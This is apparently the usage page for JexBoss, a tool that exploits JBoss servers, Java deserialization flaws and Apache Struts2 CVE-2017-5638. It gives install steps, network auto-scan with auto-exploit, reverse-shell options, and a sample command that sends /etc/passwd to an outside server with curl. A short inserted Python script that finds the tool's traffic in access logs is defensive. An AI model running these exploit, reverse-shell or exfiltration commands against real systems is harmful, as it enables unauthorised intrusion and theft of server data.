JexBoss - Jboss (and Java Deserialization Vulnerabilities) verify and Exploitation Tool


JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms, frameworks, applications, etc.

Requirements:

  • Python >= 2.7.x
  • urllib3
  • ipaddress

Installation on Linux/Mac

To install the latest version of JexBoss, please use the following commands:

  git clone https://github.com/joaomatosf/jexboss.git
  cd jexboss
  pip install -r requires.txt
  python jexboss.py -h
  python jexboss.py -host http://target_host:8080

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip

  unzip master.zip
  cd jexboss-master
  pip install -r requires.txt
  python jexboss.py -h
  python jexboss.py -host http://target_host:8080

If you are using CentOS with Python 2.6, please install Python 2.7. Example installation of Python 2.7 on CentOS using Software Collections (scl):

  yum -y install centos-release-scl
  yum -y install python27
  scl enable python27 bash


Installation on Windows

If you are using Windows, you can use Git Bash to run JexBoss. Follow the steps below:
  • Download and install Python
  • Download and install Git for Windows
  • After installing, open Git Bash (Git for Windows) and type the following commands:

  PATH=$PATH:C:\Python27\
  PATH=$PATH:C:\Python27\Scripts
  git clone https://github.com/joaomatosf/jexboss.git
  cd jexboss
  pip install -r requires.txt
  python jexboss.py -h
  python jexboss.py -host http://target_host:8080


Features:

The tool and exploits were developed and tested for:
  • JBoss Application Server versions: 3, 4, 5 and 6.
  • Java Deserialization Vulnerabilities in multiple Java frameworks, platforms and applications (e.g. Java Server Faces (JSF), Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc.)

The exploitation vectors are:
  • /admin-console
    • tested and working in JBoss versions 5 and 6
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4, 5 and 6
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4, 5 and 6
  • Application Deserialization
    • tested and working against multiple Java applications, platforms, etc., via HTTP POST parameters
  • Servlet Deserialization
    • tested and working against multiple Java applications, platforms, etc., via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)
  • Apache Struts2 CVE-2017-5638
    • tested in Apache Struts 2 applications
  • Others
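As an added example (not part of JexBoss or of this page's original text), the following Python script triages web server or forward-proxy access logs for requests to the management and invoker paths listed above, and for the webshell update check to webshell.jexboss.net mentioned under the --disable-check-updates option further down; the Common Log Format layout and the sample lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Management/invoker paths listed above as JexBoss exploitation vectors.
JEXBOSS_VECTOR_PATHS = ("/admin-console", "/jmx-console",
                        "/web-console/Invoker", "/invoker/JMXInvokerServlet")
# Host the tool's JSP webshell contacts for its update check (see the
# --disable-check-updates option in the help text further down).
WEBSHELL_UPDATE_HOST = "webshell.jexboss.net"
# Assumed Common Log Format: client IP, identd, user, [timestamp], "request line", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return (client_ip, category, detail, status) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path, status = m.group("ip"), m.group("path"), int(m.group("status"))
    # Forward-proxy logs carry the absolute URL, so the webshell update
    # check appears as a request to that host.
    if WEBSHELL_UPDATE_HOST in path:
        return (ip, "webshell-update-check", path, status)
    clean = path.split("?", 1)[0]
    for vector in JEXBOSS_VECTOR_PATHS:
        if clean == vector or clean.startswith(vector + "/"):
            # Status 200 means the endpoint is reachable, not merely probed.
            return (ip, "management-endpoint", vector, status)
    return None

def triage(lines):
    """Group findings per client; one IP touching several vectors looks like a scan."""
    findings = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit:
            findings[hit[0]].append(hit[1:])
    return dict(findings)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.168.0.26 - - [10/Mar/2017:10:00:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 1342',
    '192.168.0.26 - - [10/Mar/2017:10:00:02 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 512',
    '192.168.0.26 - - [10/Mar/2017:10:00:02 +0000] "GET /web-console/Invoker HTTP/1.1" 401 0',
    '10.0.0.5 - - [10/Mar/2017:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '10.0.0.7 - - [10/Mar/2017:10:05:00 +0000] "GET http://webshell.jexboss.net/jsp_version.txt HTTP/1.1" 200 10',
]
if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG).items():
        print(ip, hits)
```

A management endpoint answering 200 to an unauthenticated client should be treated as exposed and restricted or removed; the Windows-side equivalent is the same paths in IIS or Tomcat access logs.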

Videos:

  • Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

  • Exploiting JBoss Application Server with JexBoss

  • Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)

Screenshots:

  • Simple usage examples:
    $ python jexboss.py
  • Example of standalone mode against JBoss:
    $ python jexboss.py -u http://192.168.0.26:8080
  • Usage modes:
    $ python jexboss.py -h
  • Network scan mode:
    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
  • Network scan with auto-exploit mode:
    $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
  • Results and recommendations:

Reverse Shell (meterpreter integration)

After you exploit a JBoss server, you can use JexBoss's own command shell or perform a reverse connection using the following command:

  jexremote=YOUR_IP:YOUR_PORT

Example:

  Shell>jexremote=192.168.0.10:4444

When exploiting Java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are to open a reverse shell connection or to send a command to execute.

Usage Examples:

  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'

  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name

  • For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
    $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize

  • For Apache Struts 2 (CVE-2017-5638):
    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2

  • For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources:
    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"

  • Auto scan mode:
    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log

  • File scan mode:
    $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log


  • More Options:
optional arguments:
   -h, --help            show this help message and exit
   --version             show program's version number and exit
   --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                         PERMISSION!!!)
   --disable-check-updates, -D
                         Disable two updates checks: 1) Check for updates
                         performed by the webshell in exploited server at
                         http://webshell.jexboss.net/jsp_version.txt and 2)
                         check for updates performed by the jexboss client at
                         http://joaomatosf.com/rnp/releases.txt
   -mode {standalone,auto-scan,file-scan}
                         Operation mode (DEFAULT: standalone)
   --app-unserialize, -j
                         Check for java unserialization vulnerabilities in HTTP
                         parameters (eg. javax.faces.ViewState, oldFormData,
                         etc)
   --servlet-unserialize, -l
                         Check for java unserialization vulnerabilities in
                         Servlets (like Invoker interfaces)
   --jboss               Check only for JBOSS vectors.
   --jenkins             Check only for Jenkins CLI vector.
   --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                         (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                         checked by default.
   --proxy PROXY, -P PROXY
                         Use a http proxy to connect to the target URL (eg. -P
                         http://192.168.0.1:3128)
   --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                         Proxy authentication credentials (eg -L name:password)
   --jboss-login LOGIN:PASS, -J LOGIN:PASS
                         JBoss login and password for exploit admin-console in
                         JBoss 5 and JBoss 6 (default: admin:admin)
   --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)
 
 Standalone mode:
   -host HOST, -u HOST   Host address to be checked (eg. -u
                         http://192.168.0.10:8080)
 
 Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
   --reverse-host RHOST:RPORT, -r RHOST:RPORT
                         Remote host address and port for reverse shell when
                         exploiting Java Deserialization Vulnerabilities in
                         application layer (for now, working only against *nix
                         systems)(eg. 192.168.0.10:1331)
   --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                         @/etc/passwd http://your_server)
   --windows, -w         Specifies that the commands are for WINDOWS Systems
                         (cmd.exe)
   --post-parameter PARAMETER, -H PARAMETER
                         Specify the parameter to find and inject serialized
                         objects into it. (egs. -H javax.faces.ViewState or -H
                         oldFormData)
 

